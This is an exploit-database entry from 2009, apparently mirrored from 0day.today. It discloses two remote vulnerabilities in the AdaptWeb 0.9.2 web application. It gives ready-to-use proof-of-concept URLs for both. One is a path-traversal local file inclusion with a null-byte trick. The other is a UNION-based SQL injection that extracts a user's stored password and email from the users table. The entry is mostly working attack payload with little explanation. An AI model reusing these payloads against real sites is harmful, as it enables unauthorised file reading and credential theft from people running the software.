id: 5373
date: 06/14/2009
title: AdaptWeb 0.9.2 (LFI/SQL) Multiple Remote Vulnerabilities
author: SirGod
cves: 

========================================================
AdaptWeb 0.9.2 (LFI/SQL) Multiple Remote Vulnerabilities
========================================================


#################################################################################################################
[+] AdaptWeb 0.9.2 (LFI/SQL) Multiple Remote Vulnerabilities
[+] Script : http://adaptweb.sourceforge.net/
[+] Discovered By SirGod 
#################################################################################################################

[+] Script homepage : http://adaptweb.sourceforge.net/

[+] Local File Inclusion

- PoC 

   http://127.0.0.1/[path]/index.php?newlang=../../../../../../BOOTSECT.BAK%00


[+] SQL Injection

- PoC

   http://127.0.0.1/[path]/a_index.php?opcao=TopicosCadastro1&CodigoDisciplina=null+union+all+select+concat_ws(0x3a,senha_usuario,email_usuario)+from+usuario+where+id_usuario=1--&numtopico=1

#################################################################################################################




#  0day.today [2023-03-25]  #